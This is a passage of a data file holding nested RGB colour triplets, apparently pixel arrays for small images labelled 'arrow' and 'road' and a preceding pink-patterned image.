0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [219, 24, 96], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [219, 24, 96], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [237, 104, 155], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]]], 'arrow': [[[0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 46, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 1, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [0, 0, 0], [98, 46, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 1, 0], [0, 0, 0], [98, 46, 213], [99, 47, 212], [0, 0, 1], [0, 0, 0], [1, 1, 1], [0, 0, 0], [1, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0]], [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 1, 0], [98, 46, 213], [98, 46, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 46, 212], [1, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [1, 1, 1], [0, 1, 1], [0, 0, 1], [0, 0, 1], [0, 1, 0], [1, 0, 1], [1, 1, 0]], [[1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [1, 1, 1], [0, 0, 0], [0, 0, 1], [99, 47, 212], [98, 46, 213], [0, 0, 0], [0, 1, 0], [0, 0, 0], [0, 1, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [98, 46, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 1], [99, 47, 212], [99, 47, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 1, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [1, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 46, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 1, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]], [[1, 1, 0], [1, 0, 1], [0, 1, 0], [0, 0, 1], [0, 0, 1], [0, 1, 1], [1, 1, 1], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 1], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [99, 47, 212], [0, 0, 0], [1, 0, 0], [99, 46, 212], [99, 47, 212], [98, 47, 212], [99, 47, 212], [98, 46, 212], [98, 46, 213], [1, 1, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [99, 47, 212], [0, 0, 0], [0, 0, 0], [0, 1, 0], [1, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]]], 'road': [[[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 254], [255, 255, 255], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255]], [[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 254], [255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 254, 255], [255, 255, 255], [255, 255, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 255]], [[255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 254, 254], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [255, 255, 255], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 254, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 254, 254], [255, 255, 255], [255, 235, 59], [255, 235, 59], [254, 255, 255], [255, 255, 255], [255, 235, 59], [255, 235, 59], [255, 255, 255], [255, 255, 255], [254, 235, 59], [255, 235, 59], [255, 254, 